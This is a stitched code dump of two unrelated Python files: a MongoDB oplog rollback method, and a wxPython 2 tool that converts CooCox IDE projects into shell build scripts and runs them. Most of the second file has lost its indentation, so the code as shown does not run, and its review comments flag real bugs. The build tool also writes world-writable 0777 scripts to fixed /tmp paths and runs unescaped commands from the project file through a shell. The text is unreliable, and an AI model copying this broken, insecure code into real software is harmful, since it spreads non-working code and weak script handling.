    # Lazy %-args instead of eager string formatting.
    LOG.debug("OplogThread: reading last checkpoint as %s ", ret_val)
    self.checkpoint = ret_val
    return ret_val
def rollback(self):
    """Rollback target system to consistent state.

    The strategy is to find the latest timestamp in the target system and
    the largest timestamp in the oplog less than the latest target system
    timestamp. This defines the rollback window and we just roll these
    back until the oplog and target system are in consistent states.

    Returns the oplog timestamp the targets were rolled back to, or None
    when nothing was replicated or the relevant oplog entry is gone.
    """
    # Find the most recently inserted document in each target system
    LOG.debug("OplogThread: Initiating rollback sequence to bring "
              "system into a consistent state.")
    last_docs = []
    for dm in self.doc_managers:
        dm.commit()
        last_docs.append(dm.get_last_doc())

    # Of these documents, which is the most recent?
    last_inserted_doc = max(last_docs,
                            key=lambda x: x["_ts"] if x else float("-inf"))

    # Nothing has been replicated. No need to rollback target systems
    if last_inserted_doc is None:
        return None

    # Find the oplog entry that touched the most recent document.
    # We'll use this to figure where to pick up the oplog later.
    target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
    last_oplog_entry = util.retry_until_ok(
        self.oplog.find_one,
        {'ts': {'$lte': target_ts}, 'op': {'$ne': 'n'}},
        sort=[('$natural', pymongo.DESCENDING)]
    )

    LOG.debug("OplogThread: last oplog entry is %s"
              % str(last_oplog_entry))

    # The oplog entry for the most recent document doesn't exist anymore.
    # If we've fallen behind in the oplog, this will be caught later
    if last_oplog_entry is None:
        return None

    # rollback_cutoff_ts happened *before* the rollback
    rollback_cutoff_ts = last_oplog_entry['ts']
    start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
    # timestamp of the most recent document on any target system
    end_ts = last_inserted_doc['_ts']

    for dm in self.doc_managers:
        rollback_set = {}   # this is a dictionary of ns:list of docs
        # group potentially conflicted documents by namespace
        for doc in dm.search(start_ts, end_ts):
            if doc['ns'] in rollback_set:
                rollback_set[doc['ns']].append(doc)
            else:
                rollback_set[doc['ns']] = [doc]

        # retrieve these documents from MongoDB, either updating
        # or removing them in each target system
        for namespace, doc_list in rollback_set.items():
            # Get the original namespace
            original_namespace = self.namespace_config.unmap_namespace(
                namespace)
            if not original_namespace:
                original_namespace = namespace

            database, coll = original_namespace.split('.', 1)
            obj_id = bson.objectid.ObjectId
            bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]

            # Use connection to whole cluster if in sharded environment.
            client = self.mongos_client or self.primary_client
            to_update = util.retry_until_ok(
                client[database][coll].find,
                {'_id': {'$in': bson_obj_id_list}},
                projection=self.namespace_config.projection(
                    original_namespace)
            )
            # Doc list are docs in target system, to_update are
            # Docs in mongo
            doc_hash = {}  # Hash by _id
            for doc in doc_list:
                doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc

            to_index = []

            def collect_existing_docs():
                # Anything still in doc_hash afterwards exists only in the
                # target system and must be removed from it.
                for doc in to_update:
                    if doc['_id'] in doc_hash:
                        del doc_hash[doc['_id']]
                        to_index.append(doc)

            # NOTE(review): bare 'retry_until_ok' here, unlike
            # 'util.retry_until_ok' used elsewhere in this method --
            # presumably imported at module level; confirm.
            retry_until_ok(collect_existing_docs)

            # Delete the inconsistent documents
            LOG.debug("OplogThread: Rollback, removing inconsistent "
                      "docs.")
            remov_inc = 0
            for document_id in doc_hash:
                try:
                    dm.remove(document_id, namespace,
                              util.bson_ts_to_long(rollback_cutoff_ts))
                    remov_inc += 1
                    # NOTE(review): 'doc' below is the leftover loop
                    # variable from building doc_hash, not the document
                    # being removed -- looks like a logging bug; confirm.
                    LOG.debug(
                        "OplogThread: Rollback, removed %r " % doc)
                except errors.OperationFailed:
                    # NOTE(review): same stale 'doc' reference as above.
                    LOG.warning(
                        "Could not delete document during rollback: %r "
                        "This can happen if this document was already "
                        "removed by another rollback happening at the "
                        "same time." % doc
                    )

            LOG.debug("OplogThread: Rollback, removed %d docs." %
                      remov_inc)

            # Insert the ones from mongo
            LOG.debug("OplogThread: Rollback, inserting documents "
                      "from mongo.")
            insert_inc = 0
            fail_insert_inc = 0
            for doc in to_index:
                try:
                    insert_inc += 1
                    dm.upsert(doc,
                              namespace,
                              util.bson_ts_to_long(rollback_cutoff_ts))
                except errors.OperationFailed:
                    fail_insert_inc += 1
                    LOG.exception("OplogThread: Rollback, Unable to "
                                  "insert %r" % doc)

    LOG.debug("OplogThread: Rollback, Successfully inserted %d "
              " documents and failed to insert %d"
              " documents. Returning a rollback cutoff time of %s "
              % (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))

    return rollback_cutoff_ts
|
bspLinuxCoCoox.py | #!/usr/bin/python
import wx
import os
import time
import re
import sys, os
import os.path
import subprocess
import datetime
import xml.etree.ElementTree as ET
import threading
from threading import Thread
import wx.lib.newevent
VERSION="1.0"

# wx widget / menu IDs.
ID_BUTTON=100
ID_LOAD=101
ID_RELOAD=102
ID_UNLOAD=103
ID_TOOLCHAIN=104
# NOTE(review): ID_EXIT duplicates ID_BUTTON (both 100) -- confirm intended.
ID_EXIT=100
ID_BUILD=200
ID_REBUILD=201
ID_CANCELBUILD=202
ID_BUILDSCRIPT=203
ID_CONFIGURE=300
# NOTE(review): ID_TOOLCHAIN is re-assigned here (104 -> 301); widgets
# created later see this second value.
ID_TOOLCHAIN=301
ID_ABOUT=400
ID_SPLITTER=500

# Custom wx events used to marshal build output from the worker thread
# back to the GUI thread.
UpgradeLog, EVT_BUILD_UPGRADE_LOG = wx.lib.newevent.NewEvent()
EndBuild, EVT_END_BUILD_DONE = wx.lib.newevent.NewEvent()

# Module-wide settings: toolchain directory, toolchain prefix
# (e.g. "arm-none-eabi-") and the last used project directory.
tcp=""
tcn=""
sp=""
def drawALine():
    """Return the horizontal separator line used in the project list view."""
    separator = "__________________________________________________________________________________________________________________"
    return separator
def set_toolChainPath(val):
global tcp
tcp=val
print "[settings]toolChainPath="+tcp
def toolChainPath():
    """Return the configured toolchain directory."""
    return tcp
def set_toolChainPrefix(val):
global tcn
tcn=val
print "[settings]toolChainPrefix="+tcn
def toolChainPrefix():
    """Return the configured cross-compiler prefix."""
    return tcn
def set_startpath(val):
global sp
sp=val
print "[settings]startpath="+sp
def startpath():
    """Return the configured project start directory."""
    return sp
def readPref():
if os.path.isfile('bspLinuxCoCoox.pref') == False:
print '[settings]no default path'
set_toolChainPath("")
set_toolChainPrefix("")
set_startpath("")
savePref()
return
f = open('bspLinuxCoCoox.pref', 'r')
llist=f.readlines()
for el in llist:
if el.find("toolChainPath=")==0:
set_toolChainPath(el[len("toolChainPath="):-1])
elif el.find("toolChainPrefix=")==0:
set_toolChainPrefix(el[len("toolChainPrefix="):-1])
elif el.find("startpath=")==0:
set_startpath(el[len("startpath="):-1])
f.close()
def savePref():
    """Persist the current settings to bspLinuxCoCoox.pref.

    One "key=value" line per setting; read back by readPref().
    """
    # Context manager guarantees the file is closed even if a write fails.
    with open('bspLinuxCoCoox.pref', 'w') as f:
        f.write("toolChainPath=" + toolChainPath() + "\n")
        f.write("toolChainPrefix=" + toolChainPrefix() + "\n")
        f.write("startpath=" + startpath() + "\n")
# Load persisted preferences as soon as the module is imported.
readPref()
#projectDef is a list of string with
#[ [name1,outdir1,[define options]1,isLibrary1,outputName1,compile option1,link option1, [before build]1,[after build]1],..., [nameN,outdirN,[define options]N,isLibrary1N,outputNameN,compile optionN,link optionN, [before build]N,[after build]N]]
class MyPjMgrCtrl(wx.ListCtrl):
def __init__(self, parent, id):
self.parent=parent
wx.ListCtrl.__init__(self, parent, id, style=wx.LC_REPORT)
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
self.projectDef=[]
self.curProject=-1
self.srcListDef=[]
self.hdListDef=[]
self.loadedFile=""
def doload(self,afile):
print "[MyListCtrl] doload project"
#ok, now unload current
del self.projectDef[:]
del self.srcListDef[:]
del self.hdListDef[:]
IROMORIGIN=0x08000000
IROMLENGTH=0x0001EF00
IRAMORIGIN=0x20000000
IRAMLENGTH=0x00004000
self.projectDef=[]
self.curProject=-1
self.srcListDef=[]
self.hdListDef=[]
self.loadedFile=afile
self.ClearAll()
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
set_startpath(os.path.dirname(os.path.realpath(afile)))
savePref()
tree = ET.parse(afile)
root = tree.getroot()
allPath=[]
for files in root.iter('Files'):
for afile in files.iter('File'):
rnp=afile.get('path')
rns=rnp.split('/')
if afile.get('type') == '1':
[fileName, fileExtension]=os.path.splitext(os.path.basename(rnp))
if fileExtension == '.h':
self.hdListDef.append(rnp)
else:
self.srcListDef.append(rnp)
for hd in self.hdListDef:
allPath.append(os.path.dirname(hd))
for src in self.srcListDef:
allPath.append(os.path.dirname(src))
allPath.sort()
allPath=list(set(allPath))
for target in root.iter('Target'):
aproject=[]
BuildOption=target.find('BuildOption')
Compile=BuildOption.find('Compile')
compOpt="-mcpu=cortex-m0 -mthumb -Wall -ffunction-sections -g -I"+startpath()+" "
linkOpt="-mcpu=cortex-m0 -mthumb -g -nostartfiles -Wl,-Map=Module.map"
isCurrent=False
if target.get('isCurrent')=="1":
isCurrent=True
for opt in Compile.iter('Option'):
if opt.get('name')=='OptimizationLevel':
if opt.get('value')==4:
compOpt=compOpt+" -Os"+" "
linkOpt=linkOpt+" -Os"+" "
else:
compOpt=compOpt+" -O"+opt.get('value')+" "
linkOpt=linkOpt+" -O"+opt.get('value')+" "
elif opt.get('name')=='UserEditCompiler':
otherOpt=opt.get('value').replace(";"," ")
compOpt=compOpt+otherOpt+" "
Includepaths = Compile.find('Includepaths')
for ip in Includepaths.iter('Includepath'):
compOpt=compOpt+" -I"+os.path.join(startpath(),ip.get('path'))
for pt in allPath:
compOpt=compOpt+" -I"+os.path.join(startpath(),pt)
DefinedSymbols = Compile.find('DefinedSymbols')
defOpt=[]
for ds in DefinedSymbols.iter('Define'):
compOpt=compOpt+" -D" + ds.get('name')
defOpt.append(ds.get('name'))
Link=BuildOption.find('Link')
for opt in Link.iter('Option'):
if opt.get('name')=='UserEditLinker':
otherOpt=opt.get('value').replace(";"," ")
linkOpt=linkOpt+otherOpt+" "
LocateLinkFile=Link.find('LocateLinkFile')
LocateLinkFilePath=LocateLinkFile.get('path').replace('\\','/')
linkOpt=linkOpt+" -Wl,--gc-sections --specs=nano.specs -Wl,-T"+os.path.join(startpath(),LocateLinkFilePath)
LinkedLibraries=Link.find('LinkedLibraries')
for ll in LinkedLibraries.iter('Libset'):
alibdir=os.path.join(startpath(),ll.get('dir'))
alibdir=alibdir.replace('\\','/')
compOpt=compOpt+" -L" + alibdir+" "
compOpt=compOpt+" -l" + ll.get('libs')+" "
linkOpt=linkOpt+" -L" + alibdir+" "
linkOpt=linkOpt+" -l" + ll.get('libs')+" "
MemoryAreas=Link.find('MemoryAreas')
for ma in MemoryAreas.iter('Memory'):
if ma.get('name')=='IROM1':
IROMLENGTH=ma.get('size')
IROMORIGIN=ma.get('startValue')
if ma.get('name')=='IRAM1':
IRAMLENGTH=ma.get('size')
IRAMORIGIN=ma.get('startValue')
isLibrary=False
outputName='Module'
Output=BuildOption.find('Output')
for opt in Output.iter('Option'):
if opt.get('name') == 'OutputFileType':
if opt.get('value')=='1':
isLibrary=True
elif opt.get('name') == 'Name':
outputName= opt.get('value')
beforeBuild=[]
backupLD="cp %s %s.backup" %(os.path.join(startpath(),LocateLinkFilePath),os.path.join(startpath(),LocateLinkFilePath))
sedROM="sed -i 's/rom (rx).*/rom (rx) : ORIGIN = %s, LENGTH = %s/' %s" %(IROMORIGIN,IROMLENGTH,os.path.join(startpath(),LocateLinkFilePath))
sedRAM="sed -i 's/ram (rwx).*/ram (rwx) : ORIGIN = %s, LENGTH = %s/' %s" %(IRAMORIGIN,IRAMLENGTH,os.path.join(startpath(),LocateLinkFilePath))
beforeBuild.append(backupLD)
beforeBuild.append(sedROM)
beforeBuild.append(sedRAM)
restoreLD="mv %s.backup %s" %(os.path.join(startpath(),LocateLinkFilePath),os.path.join(startpath(),LocateLinkFilePath))
afterGCC=[]
afterGCC.append(restoreLD)
afterBuild=[]
User=BuildOption.find('User')
for UserRun in User.iter('UserRun'):
if UserRun.get('type')=='Before' and UserRun.get('checked')=='1':
exe=UserRun.get('value')
exe=exe.replace('${project.path}',startpath())
exe=exe.replace('\\','/')
exe=exe.replace('.bat','.sh')
exe=exe.replace('.exe','')
exe=exe.replace('copy','cp -f')
beforeBuild.append(exe)
elif UserRun.get('type')=='After' and UserRun.get('checked')=='1':
exe=UserRun.get('value')
exe=exe.replace('${project.path}',startpath())
exe=exe.replace('\\','/')
exe=exe.replace('.bat','.sh')
exe=exe.replace('.exe','')
exe=exe.replace('copy','cp -f')
afterBuild.append(exe)
#[name1,outdir1,[define options]1,isLibrary1,outputName1,compile option1,link option1, [before build]1,[aftergcc]1,[after build]1,srclist]
aproject.append(target.get('name'))
aproject.append(os.path.join(startpath(),target.get('name')))
aproject.append(defOpt)
aproject.append(isLibrary)
aproject.append(outputName)
aproject.append(compOpt)
aproject.append(linkOpt)
aproject.append(beforeBuild)
aproject.append(afterGCC)
aproject.append(afterBuild)
if isCurrent==True:
self.projectDef.insert(0,aproject)
else:
self.projectDef.append(aproject)
srclist=[]
for srcfile in self.srcListDef:
srclist.append(os.path.join(startpath(),srcfile))
aproject.append(srclist)
return True
def load(self):
print "[MyListCtrl] load project"
openFileDialog = wx.FileDialog(self.parent, "Open", startpath(), "", "CoIDE project (*.coproj)|*.coproj", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
openFileDialog.Destroy()
return False # the user changed idea...
afile=openFileDialog.GetPath()
openFileDialog.Destroy()
if not afile:
return False
return self.doload(afile)
def getload(self):
print "[MyListCtrl] getload::",self.loadedFile
return self.loadedFile
def unload(self):
print "[MyListCtrl] unlaod current"
del self.projectDef[:]
del self.srcListDef[:]
del self.hdListDef[:]
self.projectDef=[]
self.curProject=-1
self.srcListDef=[]
self.hdListDef=[]
self.loadedFile=""
self.ClearAll()
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
def getSubP(self):
return self.projectDef
def setSubProjectList(self,suprojectIndex):
print "[MyListCtrl]update sub pj"
self.ClearAll()
self.InsertColumn(0, 'Project')
self.SetColumnWidth(0, 600)
self.curProject=suprojectIndex
j=1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " " +os.path.basename(self.loadedFile) + " Loaded")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " OPTIONS")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
for defopt in self.projectDef[self.curProject][2]:
self.InsertStringItem(j, defopt)
j=j+1
self.InsertStringItem(j, " ")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " C FILES")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
for afile in self.srcListDef :
self.InsertStringItem(j, "+ - - - - - - "+afile)
j=j+1
self.InsertStringItem(j, " ")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
self.InsertStringItem(j, " HEADER FILES")
j=j+1
self.InsertStringItem(j,drawALine())
j=j+1
for afile in self.hdListDef:
self.InsertStringItem(j, "+ - - - - - - "+afile)
j=j+1
self.InsertStringItem(j, " ")
j=j+1
#[name1,outdir1,[define options]1,isLibrary1,outputName1,compile option1,link option1, [before build]1,[after build]1]
def generateBuildScript(self,afile,clean=False):
print "[MyListCtrl]generate build script " +afile
blib=self.projectDef[self.curProject][3]
pname=self.projectDef[self.curProject][4]
f=open(afile,"w")
f.write("#!/bin/sh\n")
f.write("STARTTIME=$(date +%s)\n")
if len(self.projectDef[self.curProject][7])>0:
for scr in self.projectDef[self.curProject][7]:
f.write(scr+'\n')
if blib== True:
f.write('echo "Compiling ' +self.projectDef[self.curProject][0] +' Library."\n')
else:
f.write('echo "Compiling ' +self.projectDef[self.curProject][0] +' Binary."\n')
f.write('echo "creating output directories:"\n')
f.write('echo "[mkdir] ' + self.projectDef[self.curProject][1]+'/Debug/bin"\n')
f.write('echo "[mkdir] ' + self.projectDef[self.curProject][1]+'/Debug/obj"\n')
f.write('mkdir -p ' + self.projectDef[self.curProject][1]+'/Debug/obj\n')
f.write('mkdir -p ' + self.projectDef[self.curProject][1]+'/Debug/bin\n')
f.write('mkdir -p ' + self.projectDef[self.curProject][1]+'/Debug/obj\n')
f.write('rm -f ' + self.projectDef[self.curProject][1]+'/Debug/bin/*\n')
f.write('rm -f ' + self.projectDef[self.curProject][1]+'/Debug/obj/*\n')
f.write('cd ' +self.projectDef[self.curProject][1]+'/Debug/obj\n')
f.write('echo "%d total files to be compiled"\n' %len(self.srcListDef))
f.write('echo "'+toolChainPrefix()+'gcc '+self.projectDef[self.curProject][5]+' -c files..."\n')
f.write(os.path.join(toolChainPath(),toolChainPrefix())+'gcc '+self.projectDef[self.curProject][5] +' -c')
f.write(' \\\n')
for srcfile in self.projectDef[self.curProject][10][0:-1]:
f.write(' ' + srcfile + ' \\\n')
f.write(' ' +self.projectDef[self.curProject][10][-1] + '\n')
f.write('\n')
f.write('cd ' +self.projectDef[self.curProject][1]+'/Debug/bin/\n')
if blib== True:
f.write('echo "Generating Library."\n')
f.write(os.path.join(toolChainPath(),toolChainPrefix())+'ar rvs lib'+pname+'.a ')
for srcfile in self.srcListDef:
[fileName, fileExtension]=os.path.splitext(os.path.basename(srcfile))
f.write(' '+os.path.join('../obj',fileName+'.o'))
f.write('\n')
f.write('if [ $? -ne 0 ]\n')
f.write('then\n')
f.write('\tENDTIME=$(date +%s)\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\techo "BUILD FAILED in $(($ENDTIME - $STARTTIME)) seconds..."\n')
f.write('else\n')
else:
f.write('echo "Linking Binary."\n')
f.write('echo "['+toolChainPrefix()+'gcc] -o '+pname+'.elf files... '+self.projectDef[self.curProject][6]+'"\n')
f.write(os.path.join(toolChainPath(),toolChainPrefix())+'gcc -o '+pname+'.elf ')
for srcfile in self.srcListDef:
[fileName, fileExtension]=os.path.splitext(os.path.basename(srcfile))
f.write(' '+os.path.join('../obj',fileName+'.o'))
f.write(' '+self.projectDef[self.curProject][6]+'\n')
f.write('if [ $? -ne 0 ]\n')
f.write('then\n')
f.write('\tENDTIME=$(date +%s)\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\techo "BUILD FAILED !!!!![$(($ENDTIME - $STARTTIME)) seconds elapsed]"\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('else\n')
f.write('\techo "Generating hex and bin output:"\n')
f.write('\t'+os.path.join(toolChainPath(),toolChainPrefix())+'objcopy -O ihex "' + pname+'.elf" "'+pname+'.hex"\n')
f.write('\t'+os.path.join(toolChainPath(),toolChainPrefix())+'objcopy -O binary "' + pname+'.elf" "'+pname+'.bin"\n')
f.write('\t'+'echo "Program Size:"\n')
f.write('\t'+os.path.join(toolChainPath(),toolChainPrefix())+'size Module.elf\n')
f.write('\t'+'cd ' + startpath()+'\n')
if len(self.projectDef[self.curProject][9])>0:
for scr in self.projectDef[self.curProject][9]:
f.write('\t'+scr+'\n')
f.write('\t'+'ENDTIME=$(date +%s)\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo "BUILD SUCCESSFULL [$(($ENDTIME - $STARTTIME)) seconds elapsed]"\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('\t'+'echo ""\n')
f.write('fi\n')
if len(self.projectDef[self.curProject][8])>0:
for scr in self.projectDef[self.curProject][8]:
f.write(scr+'\n')
f.write('cd ' + startpath()+'\n')
f.close()
os.chmod(afile, 0777)
class MyLogCtrl(wx.TextCtrl):
    """Multi-line text control used as the build-log pane."""

    def __init__(self, parent, id):
        wx.TextCtrl.__init__(self, parent, id, style=wx.TE_MULTILINE | wx.HSCROLL)
        # start with an empty log
        self.Clear()
class MainWindow(wx.Frame):
def __init__(self, parent, id, title):
wx.Frame.__init__(self, parent, -1, title)
self.splitter = wx.SplitterWindow(self, ID_SPLITTER, style=wx.SP_BORDER)
self.splitter.SetMinimumPaneSize(50)
self.showProject = MyPjMgrCtrl(self.splitter, -1)
self.showLog = MyLogCtrl(self.splitter, -1)
self.splitter.SplitVertically(self.showProject, self.showLog,-200)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_SPLITTER_DCLICK, self.OnDoubleClick, id=ID_SPLITTER)
self.filemenu= wx.Menu()
fe=self.filemenu.Append(ID_EXIT,"E&xit"," Terminate the program")
self.Bind(wx.EVT_MENU, self.OnExit, fe)
self.helpmenu = wx.Menu()
fab=self.helpmenu.Append(ID_ABOUT,"A&bout"," About this")
self.Bind(wx.EVT_MENU, self.onAbout, fab)
self.building=False
self.cancel=0
self.menuBar = wx.MenuBar()
self.menuBar.Append(self.filemenu,"&File")
self.menuBar.Append(self.helpmenu, "&Help")
self.SetMenuBar(self.menuBar)
self.Bind(wx.EVT_MENU, self.OnExit, id=ID_EXIT)
self.sizer2 = wx.BoxSizer(wx.HORIZONTAL)
self.comboBox=wx.ComboBox(self, -1)
self.Bind(wx.EVT_COMBOBOX, self.OnSelectSubProject)
self.buttonLOAD = wx.Button(self, ID_LOAD, "Load")
self.Bind(wx.EVT_BUTTON, self.OnLoad, id=ID_LOAD)
self.buttonUNLOAD = wx.Button(self, ID_UNLOAD, "Unload")
self.Bind(wx.EVT_BUTTON, self.OnUnload, id=ID_UNLOAD)
self.buttonRELOAD = wx.Button(self, ID_RELOAD, "Reload")
self.Bind(wx.EVT_BUTTON, self.OnReload, id=ID_RELOAD)
self.buttonTOOLCHAIN = wx.Button(self, ID_TOOLCHAIN, "Toolchain")
self.Bind(wx.EVT_BUTTON, self.OnToolchain, id=ID_TOOLCHAIN)
self.buttonCONFIGURE = wx.Button(self, ID_CONFIGURE, "Configure")
self.Bind(wx.EVT_BUTTON, self.OnConfigure, id=ID_CONFIGURE)
self.buttonBUILD = wx.Button(self, ID_BUILD, "Build")
self.Bind(wx.EVT_BUTTON, self.OnBuild, id=ID_BUILD)
self.buttonREBUILD = wx.Button(self, ID_REBUILD, "Rebuild")
self.Bind(wx.EVT_BUTTON, self.OnRebuild, id=ID_REBUILD)
self.buttonCANCEL = wx.Button(self, ID_CANCELBUILD, "Cancel")
self.Bind(wx.EVT_BUTTON, self.OnCancel, id=ID_CANCELBUILD)
self.buttonBUILDSCRIPT = wx.Button(self, ID_BUILDSCRIPT, "Generate build script")
self.Bind(wx.EVT_BUTTON, self.OnGenerateBuildScript, id=ID_BUILDSCRIPT)
self.buttonEXIT = wx.Button(self, ID_EXIT, "Quit")
self.Bind(wx.EVT_BUTTON, self.OnExit, id=ID_EXIT)
self.sizer2.Add(self.comboBox, 2, wx.EXPAND)
self.sizer2.Add(self.buttonLOAD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonUNLOAD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonRELOAD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonTOOLCHAIN, 1, wx.EXPAND)
self.sizer2.Add(self.buttonCONFIGURE, 1, wx.EXPAND)
self.sizer2.Add(self.buttonBUILD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonREBUILD, 1, wx.EXPAND)
self.sizer2.Add(self.buttonCANCEL, 1, wx.EXPAND)
self.sizer2.Add(self.buttonBUILDSCRIPT, 1, wx.EXPAND)
self.sizer2.Add(self.buttonEXIT, 1, wx.EXPAND)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.Add(self.sizer2,0,wx.EXPAND)
self.sizer.Add(self.splitter,1,wx.EXPAND)
self.SetSizer(self.sizer)
size = wx.DisplaySize()
self.SetSize(size)
self.sb = self.CreateStatusBar()
self.sb.SetStatusText(os.getcwd())
self.Center()
self.Show(True)
self.nothingLoaded()
self.Bind(EVT_BUILD_UPGRADE_LOG, self.upgradeLog)
self.Bind(EVT_END_BUILD_DONE, self.buildDone)
def onAbout(self, event):
dlg = wx.MessageDialog(self, "PY Tool that understand CooCox IDE project.\n Let people compile their CoIDE project on Ubuntu.\nVersion " +VERSION,"About",wx.OK|wx.ICON_EXCLAMATION)
dlg.ShowModal()
dlg.Destroy()
def greyOutAll(self,grey=True):
if grey==True:
self.cancel=0
self.building=True
self.buttonLOAD.Disable()
self.buttonUNLOAD.Disable()
self.buttonRELOAD.Disable()
self.buttonTOOLCHAIN.Disable()
self.buttonCONFIGURE.Disable()
self.buttonBUILD.Disable()
self.buttonCANCEL.Enable()
self.buttonREBUILD.Disable()
self.buttonBUILDSCRIPT.Disable()
self.buttonEXIT.Enable()
else:
self.building=False
self.buttonLOAD.Enable()
self.buttonUNLOAD.Enable()
self.buttonRELOAD.Enable()
self.buttonTOOLCHAIN.Enable()
self.buttonCONFIGURE.Enable()
self.buttonBUILD.Enable()
self.buttonREBUILD.Enable()
self.buttonCANCEL.Disable()
self.buttonBUILDSCRIPT.Enable()
self.buttonEXIT.Enable()
def nothingLoaded(self):
self.comboBox.Disable()
self.comboBox.Clear()
self.buttonLOAD.Enable()
self.buttonUNLOAD.Disable()
self.buttonRELOAD.Disable()
self.buttonTOOLCHAIN.Enable()
self.buttonCONFIGURE.Disable()
self.buttonBUILD.Disable()
self.buttonREBUILD.Disable()
self.buttonCANCEL.Disable()
self.buttonBUILDSCRIPT.Disable()
self.buttonEXIT.Enable()
self.projectloaded=False
def loaded(self):
self.buttonLOAD.Enable()
self.buttonUNLOAD.Enable()
self.buttonRELOAD.Enable()
self.buttonTOOLCHAIN.Enable()
self.buttonCONFIGURE.Enable()
self.buttonBUILD.Enable()
self.buttonREBUILD.Enable()
self.buttonBUILDSCRIPT.Enable()
self.buttonEXIT.Enable()
plist = self.showProject.getSubP()
self.comboBox.Clear()
for p in plist:
self.comboBox.Append(p[0])
self.comboBox.SetSelection(0)
self.comboBox.Enable()
self.showProject.setSubProjectList(0)
self.projectloaded=True
def OnDoubleClick(self, event):
size = self.GetSize()
self.splitter.SetSashPosition(size.x / 2)
def OnSize(self, event):
size = self.GetSize()
self.splitter.SetSashPosition(size.x / 2)
self.sb.SetStatusText(os.getcwd())
event.Skip()
def OnLoad(self, event):
if not toolChainPath():
wx.MessageBox("Please select toolchain first")
return
if not toolChainPrefix():
wx.MessageBox("Please select toolchain first")
return
self.showLog.AppendText("Loading project....")
if self.showProject.load()==True:
self.loaded()
self.showLog.AppendText("done\n")
else:
self.showLog.AppendText("aborted\n")
def OnUnload(self, event):
self.showLog.AppendText("Project unloaded\n")
self.showProject.unload()
self.nothingLoaded()
def OnReload(self,event):
self.showLog.AppendText("Project reloaded\n")
loaded=self.showProject.getload()
self.showProject.unload()
self.showProject.doload(loaded)
if self.showProject.doload(loaded)==True:
self.loaded()
self.showLog.AppendText("done\n")
else:
self.showLog.AppendText("aborted\n")
def OnSelectSubProject(self, event):
self.showLog.AppendText("Changing sub project\n")
self.showProject.setSubProjectList(self.comboBox.GetSelection())
def OnToolchain(self, event):
self.showLog.AppendText("Changing toolchain path...")
openFileDialog = wx.FileDialog(self, "Select the gcc binary to use", toolChainPath(),"", "gcc binary|*gcc*", wx.FD_OPEN)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
openFileDialog.Destroy()
self.showLog.AppendText("aborted\n")
return False
#check for
set_toolChainPath(os.path.dirname(os.path.realpath(openFileDialog.GetPath())))
prefix=(os.path.basename(openFileDialog.GetPath())).split('gcc')
set_toolChainPrefix(prefix[0])
savePref()
openFileDialog.Destroy()
self.showLog.AppendText("done\n")
def OnConfigure(self, event):
if self.projectloaded==False:
return
self.showLog.AppendText("Configure project\n")
dlg = wx.MessageDialog(self, "This feature is not yet implemented.\nBut you can still edit the xml " + os.path.basename(self.showProject.getload())+ " manually\n","Sorry...",wx.OK|wx.ICON_EXCLAMATION)
dlg.ShowModal()
dlg.Destroy()
def generateBuildScript(self,afile,clean=False):
self.showLog.AppendText("Generating build script...")
self.showProject.generateBuildScript(afile,clean)
self.showLog.AppendText("done\n")
def upgradeLog(self,event):
self.showLog.AppendText(event.attr1+"\n")
def buildDone(self,event):
self.showLog.AppendText(event.attr1+"\n")
self.greyOutAll(False)
def executeScript(self,usedScript,typeBuild):
j=1
if os.path.isfile(usedScript) == False:
newEvent = EndBuild(attr1=usedScript+ " do not exist.\nCannot "+typeBuild+" !!!!!")
wx.PostEvent(self, newEvent)
return
newEvent = UpgradeLog(attr1="Start " + typeBuild + "...")
wx.PostEvent(self, newEvent)
#GIVE EXECUTE RIGHT
os.chmod(usedScript, 0777)
sub_process = subprocess.Popen(usedScript,shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
for line in iter(sub_process.stdout.readline, ''):
line = line.replace('\r', '').replace('\n', '')
newEvent = UpgradeLog(attr1=line)
wx.PostEvent(self, newEvent)
if self.cancel != 0:
break
if os.path.isfile(usedScript) == True:
os.remove(usedScript)
newEvent = EndBuild(attr1=typeBuild+" process end")
wx.PostEvent(self, newEvent)
self.cancel=2
def OnBuild(self, event):
if self.projectloaded==False:
return
self.showLog.Clear()
self.greyOutAll()
self.building=True
self.showLog.AppendText("Build process start.\n")
self.generateBuildScript("/tmp/build.sh")
t = Thread(target=self.executeScript, args=(["/tmp/build.sh","Build"]))
t.start()
def OnCancel(self, event):
if self.building==False:
return
if self.cancel==0:
newEvent = UpgradeLog(attr1="\n\n\n\t\tCANCELLING....\n\n\n")
wx.PostEvent(self, newEvent)
self.cancel=1
def OnRebuild(self, event):
if self.projectloaded==False:
return
self.showLog.Clear()
self.greyOutAll()
self.showLog.AppendText("Rebuild process start.\n")
self.generateBuildScript("/tmp/rebuild.sh",True)
